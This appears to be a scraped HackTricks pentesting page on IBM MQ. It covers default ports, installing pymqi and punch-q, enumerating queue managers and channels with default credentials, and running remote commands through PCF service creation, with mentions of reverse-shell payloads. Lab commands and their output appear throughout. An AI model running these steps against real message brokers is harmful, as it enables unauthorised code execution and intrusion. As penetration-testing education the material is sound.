Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Support HackTricks
Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.
Basic information
IBM MQ is an IBM technology to manage message queues. As other message broker technologies, it is dedicated to receive, store, process and classify information between producers and consumers.
By default, it exposes IBM MQ TCP port 1414. Sometimes, HTTP REST API can be exposed on port 9443. Metrics (Prometheus) could also be accessed from TCP port 9157.
The IBM MQ TCP port 1414 can be used to manipulate messages, queues, channels, ... but also to control the instance.
IBM provides a large technical documentation available on .
Tools
A suggested tool for easy exploitation is , with Docker usage. The tool is actively using the Python library pymqi.
For a more manual approach, use the Python library . are needed.
Installing pymqi
IBM MQ dependencies needs to be installed and loaded:
If you are under Kali Linux, modify the file mqlicense.sh: remove/comment the following lines (between lines 105-110):
if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
then
echo "ERROR: This package is incompatible with this system"
echo " This package was built for ${BUILD_PLATFORM}"
exit 1
fi
Then, temporary add the .so files to LD: export LD_LIBRARY_PATH=/opt/mqm/lib64, before running other tools using these dependencies.
Using punch-q
With Docker
Simply use: sudo docker run --rm -ti leonjza/punch-q.
Without Docker
After, it can be used with punch-q command.
Enumeration
You can try to enumerate the queue manager name, the users, the channels and the queues with punch-q or pymqi.
Queue Manager
Sometimes, there is no protection against getting the Queue Manager name:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
Channels
punch-q is using an internal (modifiable) wordlist to find existing channels. Usage example:
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
It happens that some IBM MQ instances accept unauthenticated MQ requests, so --username / --password is not needed. Of course, access rights can also vary.
As soon as we get one channel name (here: DEV.ADMIN.SVRCONN), we can enumerate all other channels.
The enumeration can basically be done with this code snippet code/examples/dis_channels.py from pymqi:
Do not hesitate to iterate on all identified queues.
Code execution
You can find a list of PCF commands:
There is also a warning of the command in the docs: "Attention: This command allows a user to run an arbitrary command with mqm authority. If granted rights to use this command, a malicious or careless user could define a service which damages your systems or data, for example, by deleting essential files."
Note: always according to IBM MQ documentation (Administration Reference), there is also an HTTP endpoint at /admin/action/qmgr/{qmgrName}/mqsc to run the equivalent MQSC command for service creation (DEFINE SERVICE). This aspect is not covered yet here.
The service creation / deletion with PCF for remote program execution can be done by punch-q:
In the logs of IBM MQ, you can read the command is successfully executed:
2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
You can also enumerate existing programs on the machine (here /bin/doesnotexist ... does not exist):
❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
Be aware that the program launch is asynchronous. So you need a second item to leverage the exploit(listener for reverse shell, file creation on different service, data exfiltration through network ...)
Example 2
For easy reverse shell, punch-q proposes also two reverse shell payloads :
One with bash
One with perl
Of course you can build a custom one with the execute command.
By default, the authentication is enabled, the username is admin and the password is passw0rd (Environment variable MQ_ADMIN_PASSWORD). Here, the queue manager name has been set to MYQUEUEMGR (variable MQ_QMGR_NAME).
You should have the IBM MQ up and running with its ports exposed:
❯ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
The old version of IBM MQ docker images are at: https://hub.docker.com/r/ibmcom/mq/.
References
Create an account (IBMid) on .
Download IBM MQ libraries from . For Linux x86_64 it is 9.0.0.4-IBM-MQC-LinuxX64.tar.gz.
Then, you can clone the project : it contains interesting code snippets, constants, ... Or you can directly install the library with: pip install pymqi.
Clone the project then follow the readme for installation (pip install -r requirements.txt && python3 setup.py install).
Some details before continuing: IBM MQ can be controlled though multiple ways: MQSC, PCF, Control Command. Some general lists can be found in .
(Programmable Command Formats) is what we are focused on to interact remotely with the instance. punch-q and furthermore pymqi are based on PCF interactions.
, and
.
One interesting command is MQCMD_CREATE_SERVICE and its documentation is available . It takes as argument a StartCommand pointing to a local program on the instance (example: /bin/sh).
If you cannot find the constant names, you can refer to the .
Example for (Decimal = 73). It needs the parameter MQCA_CLUSTER_NAME (Decimal = 2029) which can be * (Doc: ):